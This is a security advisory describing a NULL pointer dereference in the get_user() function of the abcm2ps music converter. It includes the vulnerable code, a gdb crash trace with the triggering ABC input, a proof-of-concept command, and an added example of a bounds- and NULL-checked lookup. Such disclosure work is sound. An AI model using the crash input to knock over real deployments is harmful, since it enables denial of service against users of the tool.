Null pointer dereference vulnerability in the function get_user() – abcm2ps-8.14.1

December 17, 2018

CVE Number

CWE

CWE-476: NULL Pointer Dereference

Product Details

abcm2ps is a C program which converts music tunes from the ABC music notation to PostScript or SVG.
URL: https://github.com/leesavide/abcm2ps.git

Vulnerable Versions

8.14.1-master

Vulnerability Details

A NULL pointer dereference vulnerability was discovered in abcm2ps (8.14.1-master). It can be triggered by passing a crafted ABC file to the abcm2ps binary, allowing an attacker to cause a denial of service (segmentation fault) or possibly have unspecified other impact when a victim opens a specially crafted file.

SYNOPSIS

The function parse_line() parses an ABC line; for an information field it calls parse_info(), which in turn calls get_user() in abcparse.c to handle a user-defined symbol. In get_user(), the call strcmp(value, "beambreak") reads through the pointer value, which is already NULL.
After debugging we observed that char *value is assigned from parse.deco_tb[s->u.user.value - 128], which is 0x0, leading to the segmentation fault (NULL pointer dereference).

Vulnerable code

		value = parse.deco_tb[s->u.user.value - 128];
		if (strcmp(value, "beambreak") == 0)
			char_tb[c] = CHAR_SPAC;

Analysis

In function get_user() in abcparse.c:

		value = parse.deco_tb[s->u.user.value - 128];
		if (strcmp(value, "beambreak") == 0)
			char_tb[c] = CHAR_SPAC;
		else if (strcmp(value, "ignore") == 0)
			char_tb[c] = CHAR_IGN;
		else if (strcmp(value, "nil") == 0
		      || strcmp(value, "none") == 0)
────────────────────────────────────────────────────────────────────────────────────────────────────────
[#0] Id 1, Name: "abcm2ps", stopped, reason: SIGSEGV
────────────────────────────────────────────────────────────────────────────────────────────────────────
[#0] 0x55555555dbdb → get_user(p=0x5555557f4a27 "tenu", s=0x55555580da68)
[#1] 0x55555555fb7b → parse_info(p=0x5555557f4a22 "M = !tenu")
[#2] 0x555555561edd → parse_line(p=0x5555557f4a20 "U:M = !tenu")
[#3] 0x555555561edd → abc_parse(p=0x5555557f4a20 "U:M = !tenu", fname=0x5555557f39f0 "POC", ln=0x3)
[#4] 0x555555579a54 → txt_add_eos(fname=0x5555557f39f0 "POC", linenum=0x3)
[#5] 0x555555579ee4 → frontend(s=, ftype=, fname=, linenum=)
[#6] 0x55555555ce2d → treat_file(fn=0x7fffffffe26a "POC", ext=)
[#7] 0x55555555b9e1 → main(argc=0x17, argv=0x7fffffffde38)
gef➤  p parse.deco_tb
$1 = {0x0 }
gef➤  ptype value
type = char *
gef➤  p value
$2 = 0x0
gef➤  i r
rax            0x0	0x0
rbx            0x5555557f4a27	0x5555557f4a27
rcx            0xa	0xa
rdx            0x5555557c49a0	0x5555557c49a0
rsi            0x0	0x0
rdi            0x5555555a3005	0x5555555a3005
rbp            0x4d	0x4d
rsp            0x7fffffffd850	0x7fffffffd850
r8             0xe	0xe
r9             0x1	0x1
r10            0xc	0xc
r11            0x246	0x246
r12            0x55555580da68	0x55555580da68
r13            0x5555557b5060	0x5555557b5060
r14            0x55555580fb9e	0x55555580fb9e
r15            0x0	0x0
rip            0x55555555dbdb	0x55555555dbdb 
eflags         0x10282	[ SF IF RF ]
cs             0x33	0x33
ss             0x2b	0x2b
ds             0x0	0x0
es             0x0	0x0
fs             0x0	0x0
gs             0x0	0x0
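The root cause above is a table lookup whose result is used by strcmp() without being validated: an unassigned slot of parse.deco_tb holds NULL, and the index itself is never bounds-checked. The following is an added example, not abcm2ps code or the project's fix, showing the same lookup written with both checks in place. The strings "beambreak", "ignore", "nil", "none" and the names deco_tb, CHAR_SPAC and CHAR_IGN are taken from the advisory; DECO_BASE, DECO_TB_SIZE, CHAR_NONE, CHAR_OTHER, CHAR_BAD, lookup_user_char() and the sample table are constructed for the example.

```c
/* Added example (not abcm2ps code): a bounds- and NULL-checked version of the
 * user-symbol lookup shown in the Analysis section. The strings "beambreak",
 * "ignore", "nil", "none" and the names deco_tb, CHAR_SPAC, CHAR_IGN come
 * from the advisory; DECO_BASE, DECO_TB_SIZE, CHAR_NONE, CHAR_OTHER, CHAR_BAD,
 * lookup_user_char() and the sample table are constructed here. */
#include <stdio.h>
#include <string.h>

#define DECO_BASE    128   /* user values are offset by 128 (s->u.user.value - 128) */
#define DECO_TB_SIZE 128   /* assumed capacity of the decoration table */

enum {
    CHAR_BAD   = -1,   /* out-of-range index or empty (NULL) slot */
    CHAR_SPAC  =  1,
    CHAR_IGN   =  2,
    CHAR_NONE  =  3,   /* "nil" / "none" */
    CHAR_OTHER =  4    /* any other defined decoration */
};

/* Constructed table: only the first four slots are populated; the remaining
 * slots are NULL, which is the state gdb showed (p parse.deco_tb -> {0x0 ...}). */
static const char *deco_tb[DECO_TB_SIZE] = { "beambreak", "ignore", "nil", "none" };

/* Resolve a user-symbol value to a char_tb class. The vulnerable code did
 *     value = parse.deco_tb[s->u.user.value - 128];
 *     if (strcmp(value, "beambreak") == 0) ...
 * with no check on the index or on value, so an unassigned slot (NULL) is
 * dereferenced inside strcmp(). Both checks are added here. */
int lookup_user_char(const char *const *tb, size_t tb_len, int user_value)
{
    /* The index must land inside the table. */
    if (user_value < DECO_BASE || (size_t)(user_value - DECO_BASE) >= tb_len)
        return CHAR_BAD;

    const char *value = tb[user_value - DECO_BASE];

    /* The missing check from the advisory: never hand a NULL to strcmp(). */
    if (value == NULL)
        return CHAR_BAD;

    if (strcmp(value, "beambreak") == 0)
        return CHAR_SPAC;
    if (strcmp(value, "ignore") == 0)
        return CHAR_IGN;
    if (strcmp(value, "nil") == 0 || strcmp(value, "none") == 0)
        return CHAR_NONE;
    return CHAR_OTHER;
}

int main(void)
{
    /* 128..131 hit populated slots; 132 is an empty slot; 127 and 300 are out of range. */
    int probes[] = { 128, 129, 130, 131, 132, 127, 300 };
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++)
        printf("user value %3d -> class %d\n", probes[i],
               lookup_user_char(deco_tb, DECO_TB_SIZE, probes[i]));
    return 0;
}
```

Returning a distinct CHAR_BAD for both failure modes lets the caller report a malformed U: field instead of crashing; an equivalent fix in the real parser would reject the line (or fall back to a default class) at the point where the advisory's code performs the strcmp().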
Tested environment

64-bit ubuntu 16.04 LTS

Proof of Concept

./abcm2ps r -E -g -x -v -O fff -O = -i -k 1 $POC -s 10 -w 1 -m 100 -d 100 -a 0 -f musicfont.fmt -D Bar/ -p -l -I 500 -x -M -N 3 -1 -G -j 0 -b 1 -f -T all -c -B 10

Timeline

Vendor Disclosure: 2018-12-13
Public Disclosure:

Credit

Discovered by ACE Team – Loginsoft